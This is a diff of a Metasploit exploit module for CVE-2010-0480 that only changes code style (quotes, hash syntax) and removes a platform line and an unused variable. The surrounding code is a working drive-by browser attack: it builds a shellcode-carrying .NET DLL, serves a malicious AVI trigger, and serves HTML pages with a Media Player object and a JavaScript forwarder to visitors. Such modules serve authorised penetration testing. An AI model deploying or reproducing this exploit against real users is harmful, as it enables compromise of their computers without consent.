@@ -42,9 +42,8 @@ class MetasploitModule < Msf::Exploit::Remote
           'Space' => 4000
         },
         'DefaultOptions' => {
-          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
-        'Platform' => %w{win},
         'Targets' => [
           # Target 0: Automatic
           # Tested with:
@@ -81,18 +80,18 @@ class MetasploitModule < Msf::Exploit::Remote
     # Use our own custom .Net binary, because we require a much bigger file
     # to land our payload at the right place
     opts = {
-      :template => 'template_dotnetmem.dll',
-      :text_offset => 0x1285,
-      :text_max => 0x20000,
-      :pack => 'a131072',
-      :uuid_offset => 135816
+      template: 'template_dotnetmem.dll',
+      text_offset: 0x1285,
+      text_max: 0x20000,
+      pack: 'a131072',
+      uuid_offset: 135816
     }
 
     @dotnet_payload = Msf::Util::EXE.to_dotnetmem(ibase, shellcode, opts)
 
     # Load our AVI file
-    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2010-0480.avi")
-    f = File.open(path, "rb")
+    path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2010-0480.avi')
+    f = File.open(path, 'rb')
     @trigger = f.read(f.stat.size)
     f.close
 
@@ -113,9 +112,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if (request.uri =~ /\.html/i)
       avi_name = rand_text_alpha(4)
-      avi_trigger = ""
+      avi_trigger = ''
 
-      if ("/" == get_resource[-1, 1])
+      if ('/' == get_resource[-1, 1])
         avi_trigger = get_resource[0, get_resource.length - 1]
       else
         avi_trigger = get_resource
@@ -123,7 +122,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       avi_trigger << "/#{avi_name}.avi"
 
-      html = %Q|<html>
+      html = %(<html>
       <body>
       <OBJECT ID="MediaPlayer"
       CLASSID="CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95"
@@ -149,22 +148,22 @@ class MetasploitModule < Msf::Exploit::Remote
       </OBJECT>
       </body>
       </html>
-      |
+      )
 
       html = html.gsub(/^ {6}/, '')
 
-      print_status("Sending trigger loader")
+      print_status('Sending trigger loader')
       send_response_html(cli, html)
 
     elsif (request.uri =~ /\.avi$/i)
 
-      print_status "Sending AVI trigger"
+      print_status 'Sending AVI trigger'
       send_response(cli, @trigger, { 'Content-Type' => 'application/octet-stream' })
       return
 
     elsif (request.uri =~ /\.dll$/i)
 
-      print_status "Sending DLL file"
+      print_status 'Sending DLL file'
       send_response(
         cli,
         @dotnet_payload,
@@ -179,10 +178,10 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     html_name = rand_text_alpha(4)
-    dll_uri = ""
-    html_trigger = ""
+    dll_uri = ''
+    html_trigger = ''
 
-    if ("/" == get_resource[-1, 1])
+    if ('/' == get_resource[-1, 1])
       dll_uri = get_resource[0, get_resource.length - 1]
       html_trigger = get_resource[0, get_resource.length - 1]
     else
@@ -190,11 +189,10 @@ class MetasploitModule < Msf::Exploit::Remote
       html_trigger = get_resource
     end
 
-    dll_uri << "/generic-" + Time.now.to_i.to_s + ".dll"
-    js_net_dll = "<object classid=\"#{dll_uri}\"#GenericControl\"><object>"
+    dll_uri << '/generic-' + Time.now.to_i.to_s + '.dll'
     html_trigger << "/#{html_name}.html"
 
-    html = %Q|<html>
+    html = %|<html>
     <head>
     <script language="javascript">
       function forward() {
@@ -215,7 +213,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     html = html.gsub(/^ {4}/, '')
 
-    print_status("Sending #{self.name}")
+    print_status("Sending #{name}")
     send_response_html(cli, html)
   end
 end
